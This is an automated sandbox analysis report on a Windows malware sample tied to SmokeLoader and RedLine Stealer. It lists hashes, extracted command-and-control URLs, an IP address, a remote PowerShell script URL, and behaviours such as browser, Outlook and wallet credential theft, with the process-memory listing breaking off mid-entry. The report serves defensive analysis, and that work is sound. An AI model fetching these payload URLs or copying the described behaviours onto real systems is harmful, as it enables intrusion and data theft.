Analysis
-
max time kernel
152s -
max time network
142s -
platform
windows10_x64 -
resource
win10-en-20211104 -
submitted
02-12-2021 16:55
Static task
static1
Behavioral task
behavioral1
Sample
d0952af06d5f8ca8df078913d6e36d61e3b79c9aec03416042e5414497ecfc38.exe
Resource
win10-en-20211104
General
-
Target
d0952af06d5f8ca8df078913d6e36d61e3b79c9aec03416042e5414497ecfc38.exe
-
Size
234KB
-
MD5
8a9b7acd470f23cfbd45530fd1508683
-
SHA1
b7fc2e2d2567267b2f019d1ac034b06935158c6b
-
SHA256
d0952af06d5f8ca8df078913d6e36d61e3b79c9aec03416042e5414497ecfc38
-
SHA512
8e6a26c2aac183ca32d23c0cc45ea7a7c8446b2569bd9470bba1cd6c30aedfd1dc4eea8c8ea2d0895d0f7b14adada19dffdf8d3b212de93ba34566c9c0402048
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Extracted
smokeloader
2020
http://rcacademy.at/upload/
http://e-lanpengeonline.com/upload/
http://vjcmvz.cn/upload/
http://galala.ru/upload/
http://witra.ru/upload/
https://cinems.club/search.php
https://clothes.surf/search.php
Extracted
redline
1
45.9.20.59:46287
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
Processes:
resource yara_rule behavioral1/memory/876-142-0x0000000004A80000-0x0000000004AAE000-memory.dmp family_redline behavioral1/memory/876-145-0x0000000007620000-0x000000000764C000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Windows dir Microsoft Windows DOS prompt command exit OUTBOUND
suricata: ET MALWARE Windows dir Microsoft Windows DOS prompt command exit OUTBOUND
-
suricata: ET MALWARE Windows route Microsoft Windows DOS prompt command exit OUTBOUND
suricata: ET MALWARE Windows route Microsoft Windows DOS prompt command exit OUTBOUND
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
Processes:
powershell.exeflow pid process 107 2252 powershell.exe 109 2252 powershell.exe 110 2252 powershell.exe 111 2252 powershell.exe 113 2252 powershell.exe 115 2252 powershell.exe 117 2252 powershell.exe 119 2252 powershell.exe 121 2252 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 5 IoCs
Processes:
3218.exeSmartClock.exe50CC.exe8328.exeCFF1.exepid process 2208 3218.exe 896 SmartClock.exe 1688 50CC.exe 876 8328.exe 1312 CFF1.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Modifies Windows Firewall 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Deletes itself 1 IoCs
Processes:
pid process 2264 -
Drops startup file 1 IoCs
Processes:
3218.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SmartClock.lnk 3218.exe -
Loads dropped DLL 2 IoCs
Processes:
pid process 3768 3768 -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
explorer.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe Key opened \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe Key opened \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe -
Drops file in Windows directory 19 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File created C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_jakwdqzk.1jj.psm1 powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_aovvc3sr.1xv.ps1 powershell.exe File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI3F42.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI408D.tmp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI3FB1.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI3FB2.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI40EC.tmp powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 2252 3836 WerFault.exe DllHost.exe -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
50CC.exed0952af06d5f8ca8df078913d6e36d61e3b79c9aec03416042e5414497ecfc38.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 50CC.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 50CC.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 50CC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI d0952af06d5f8ca8df078913d6e36d61e3b79c9aec03416042e5414497ecfc38.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI d0952af06d5f8ca8df078913d6e36d61e3b79c9aec03416042e5414497ecfc38.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI d0952af06d5f8ca8df078913d6e36d61e3b79c9aec03416042e5414497ecfc38.exe -
Enumerates processes with tasklist 1 TTPs 1 IoCs
-
Gathers network information 2 TTPs 4 IoCs
Uses commandline utility to view network configuration.
Processes:
ipconfig.exeNETSTAT.EXENETSTAT.EXEipconfig.exepid process 736 ipconfig.exe 2208 NETSTAT.EXE 2764 NETSTAT.EXE 1532 ipconfig.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
Processes:
IEXPLORE.EXEiexplore.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{70D81563-55EC-11EC-B34F-EA93EE369050} = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Internet Explorer\Main\DisableFirstRunCustomize = "1" Key created \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\SOFTWARE\Microsoft\Internet Explorer\Main Key created \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Icon = "shell32.dll#0018" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Icon = "inetcpl.cpl#001313" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1200 = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1400 = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Description = "Your computer" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\CurrentLevel = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Icon = "inetcpl.cpl#00004480" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Icon = "inetcpl.cpl#00004480" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\LowIcon = "inetcpl.cpl#005425" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\ef29a4ec885fa451 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,User Agent," powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "Computer" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\SelfHealCount = "1" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "My Computer [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\CurrentLevel = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1200 = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IE5_UA_Backup_Flag = "5.0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\DisplayName = "Restricted sites" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1200 = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\DisplayName = "Internet" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\CurrentLevel = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\PMDisplayName = "Internet [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Icon = "inetcpl.cpl#00004481" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\CurrentLevel = "66816" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\PMDisplayName = "Local intranet [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ftp = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe -
Modifies registry class 2 IoCs
Processes:
description ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance Key created \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 109 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 110 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 111 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 113 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
SmartClock.exepid process 896 SmartClock.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
d0952af06d5f8ca8df078913d6e36d61e3b79c9aec03416042e5414497ecfc38.exepid process 2368 d0952af06d5f8ca8df078913d6e36d61e3b79c9aec03416042e5414497ecfc38.exe 2368 d0952af06d5f8ca8df078913d6e36d61e3b79c9aec03416042e5414497ecfc38.exe 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 2264 -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 620 620 -
Suspicious behavior: MapViewOfSection 58 IoCs
Processes:
d0952af06d5f8ca8df078913d6e36d61e3b79c9aec03416042e5414497ecfc38.exe50CC.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exepid process 2368 d0952af06d5f8ca8df078913d6e36d61e3b79c9aec03416042e5414497ecfc38.exe 1688 50CC.exe 2264 2264 2264 2264 2264 2264 820 explorer.exe 820 explorer.exe 2264 2264 1944 explorer.exe 1944 explorer.exe 2264 2264 3404 explorer.exe 3404 explorer.exe 2264 2264 2120 explorer.exe 2120 explorer.exe 2264 2264 3616 explorer.exe 3616 explorer.exe 3616 explorer.exe 3616 explorer.exe 2264 2264 504 explorer.exe 504 explorer.exe 504 explorer.exe 504 explorer.exe 504 explorer.exe 504 explorer.exe 504 explorer.exe 504 explorer.exe 504 explorer.exe 504 explorer.exe 504 explorer.exe 504 explorer.exe 504 explorer.exe 504 explorer.exe 504 explorer.exe 504 explorer.exe 504 explorer.exe 504 explorer.exe 504 explorer.exe 504 explorer.exe 504 explorer.exe 504 explorer.exe 504 explorer.exe 504 explorer.exe 504 explorer.exe 504 explorer.exe 504 explorer.exe 504 explorer.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
8328.exeWMIC.exeWMIC.exedescription pid process Token: SeShutdownPrivilege 2264 Token: SeCreatePagefilePrivilege 2264 Token: SeShutdownPrivilege 2264 Token: SeCreatePagefilePrivilege 2264 Token: SeDebugPrivilege 876 8328.exe Token: SeIncreaseQuotaPrivilege 3520 WMIC.exe Token: SeSecurityPrivilege 3520 WMIC.exe Token: SeTakeOwnershipPrivilege 3520 WMIC.exe Token: SeLoadDriverPrivilege 3520 WMIC.exe Token: SeSystemProfilePrivilege 3520 WMIC.exe Token: SeSystemtimePrivilege 3520 WMIC.exe Token: SeProfSingleProcessPrivilege 3520 WMIC.exe Token: SeIncBasePriorityPrivilege 3520 WMIC.exe Token: SeCreatePagefilePrivilege 3520 WMIC.exe Token: SeBackupPrivilege 3520 WMIC.exe Token: SeRestorePrivilege 3520 WMIC.exe Token: SeShutdownPrivilege 3520 WMIC.exe Token: SeDebugPrivilege 3520 WMIC.exe Token: SeSystemEnvironmentPrivilege 3520 WMIC.exe Token: SeRemoteShutdownPrivilege 3520 WMIC.exe Token: SeUndockPrivilege 3520 WMIC.exe Token: SeManageVolumePrivilege 3520 WMIC.exe Token: 33 3520 WMIC.exe Token: 34 3520 WMIC.exe Token: 35 3520 WMIC.exe Token: 36 3520 WMIC.exe Token: SeIncreaseQuotaPrivilege 3520 WMIC.exe Token: SeSecurityPrivilege 3520 WMIC.exe Token: SeTakeOwnershipPrivilege 3520 WMIC.exe Token: SeLoadDriverPrivilege 3520 WMIC.exe Token: SeSystemProfilePrivilege 3520 WMIC.exe Token: SeSystemtimePrivilege 3520 WMIC.exe Token: SeProfSingleProcessPrivilege 3520 WMIC.exe Token: SeIncBasePriorityPrivilege 3520 WMIC.exe Token: SeCreatePagefilePrivilege 3520 WMIC.exe Token: SeBackupPrivilege 3520 WMIC.exe Token: SeRestorePrivilege 3520 WMIC.exe Token: SeShutdownPrivilege 3520 WMIC.exe Token: SeDebugPrivilege 3520 WMIC.exe Token: SeSystemEnvironmentPrivilege 3520 WMIC.exe Token: SeRemoteShutdownPrivilege 3520 WMIC.exe Token: SeUndockPrivilege 3520 WMIC.exe Token: SeManageVolumePrivilege 3520 WMIC.exe Token: 33 3520 WMIC.exe Token: 34 3520 WMIC.exe Token: 35 3520 WMIC.exe Token: 36 3520 WMIC.exe Token: SeIncreaseQuotaPrivilege 492 WMIC.exe Token: SeSecurityPrivilege 492 WMIC.exe Token: SeTakeOwnershipPrivilege 492 WMIC.exe Token: SeLoadDriverPrivilege 492 WMIC.exe Token: SeSystemProfilePrivilege 492 WMIC.exe Token: SeSystemtimePrivilege 492 WMIC.exe Token: SeProfSingleProcessPrivilege 492 WMIC.exe Token: SeIncBasePriorityPrivilege 492 WMIC.exe Token: SeCreatePagefilePrivilege 492 WMIC.exe Token: SeBackupPrivilege 492 WMIC.exe Token: SeRestorePrivilege 492 WMIC.exe Token: SeShutdownPrivilege 492 WMIC.exe Token: SeDebugPrivilege 492 WMIC.exe Token: SeSystemEnvironmentPrivilege 492 WMIC.exe Token: SeRemoteShutdownPrivilege 492 WMIC.exe Token: SeUndockPrivilege 492 WMIC.exe Token: SeManageVolumePrivilege 492 WMIC.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
Processes:
iexplore.exepid process 2264 2264 968 iexplore.exe -
Suspicious use of SendNotifyMessage 3 IoCs
Processes:
pid process 2264 2264 2264 -
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
iexplore.exeIEXPLORE.EXEpid process 968 iexplore.exe 968 iexplore.exe 1588 IEXPLORE.EXE 1588 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
3218.execmd.exeCFF1.exepowershell.execsc.execsc.exedescription pid process target process PID 2264 wrote to memory of 2208 2264 3218.exe PID 2264 wrote to memory of 2208 2264 3218.exe PID 2264 wrote to memory of 2208 2264 3218.exe PID 2208 wrote to memory of 896 2208 3218.exe SmartClock.exe PID 2208 wrote to memory of 896 2208 3218.exe SmartClock.exe PID 2208 wrote to memory of 896 2208 3218.exe SmartClock.exe PID 2264 wrote to memory of 1688 2264 50CC.exe PID 2264 wrote to memory of 1688 2264 50CC.exe PID 2264 wrote to memory of 1688 2264 50CC.exe PID 2264 wrote to memory of 876 2264 8328.exe PID 2264 wrote to memory of 876 2264 8328.exe PID 2264 wrote to memory of 876 2264 8328.exe PID 2264 wrote to memory of 2776 2264 cmd.exe PID 2264 wrote to memory of 2776 2264 cmd.exe PID 2776 wrote to memory of 3520 2776 cmd.exe WMIC.exe PID 2776 wrote to memory of 3520 2776 cmd.exe WMIC.exe PID 2776 wrote to memory of 492 2776 cmd.exe WMIC.exe PID 2776 wrote to memory of 492 2776 cmd.exe WMIC.exe PID 2776 wrote to memory of 1752 2776 cmd.exe WMIC.exe PID 2776 wrote to memory of 1752 2776 cmd.exe WMIC.exe PID 2776 wrote to memory of 2848 2776 cmd.exe WMIC.exe PID 2776 wrote to memory of 2848 2776 cmd.exe WMIC.exe PID 2776 wrote to memory of 3236 2776 cmd.exe WMIC.exe PID 2776 wrote to memory of 3236 2776 cmd.exe WMIC.exe PID 2776 wrote to memory of 3876 2776 cmd.exe WMIC.exe PID 2776 wrote to memory of 3876 2776 cmd.exe WMIC.exe PID 2776 wrote to memory of 1164 2776 cmd.exe WMIC.exe PID 2776 wrote to memory of 1164 2776 cmd.exe WMIC.exe PID 2776 wrote to memory of 820 2776 cmd.exe WMIC.exe PID 2776 wrote to memory of 820 2776 cmd.exe WMIC.exe PID 2776 wrote to memory of 2888 2776 cmd.exe WMIC.exe PID 2776 wrote to memory of 2888 2776 cmd.exe WMIC.exe PID 2264 wrote to memory of 1312 2264 CFF1.exe PID 2264 wrote to memory of 1312 2264 CFF1.exe PID 2776 wrote to memory of 1316 2776 cmd.exe WMIC.exe PID 2776 wrote to memory of 1316 2776 cmd.exe WMIC.exe PID 2776 wrote to memory of 2976 2776 cmd.exe WMIC.exe PID 2776 wrote to memory of 2976 2776 cmd.exe WMIC.exe PID 2776 wrote to memory of 1728 2776 cmd.exe WMIC.exe PID 2776 wrote to memory of 1728 2776 cmd.exe WMIC.exe PID 2776 wrote to memory of 3588 2776 cmd.exe WMIC.exe PID 2776 wrote to memory of 3588 2776 cmd.exe WMIC.exe PID 2776 wrote to memory of 1540 2776 cmd.exe WMIC.exe PID 2776 wrote to memory of 1540 2776 cmd.exe WMIC.exe PID 1312 wrote to memory of 2836 1312 CFF1.exe powershell.exe PID 1312 wrote to memory of 2836 1312 CFF1.exe powershell.exe PID 2776 wrote to memory of 736 2776 cmd.exe ipconfig.exe PID 2776 wrote to memory of 736 2776 cmd.exe ipconfig.exe PID 2836 wrote to memory of 3640 2836 powershell.exe csc.exe PID 2836 wrote to memory of 3640 2836 powershell.exe csc.exe PID 2776 wrote to memory of 2368 2776 cmd.exe ROUTE.EXE PID 2776 wrote to memory of 2368 2776 cmd.exe ROUTE.EXE PID 3640 wrote to memory of 764 3640 csc.exe cvtres.exe PID 3640 wrote to memory of 764 3640 csc.exe cvtres.exe PID 2776 wrote to memory of 504 2776 cmd.exe netsh.exe PID 2776 wrote to memory of 504 2776 cmd.exe netsh.exe PID 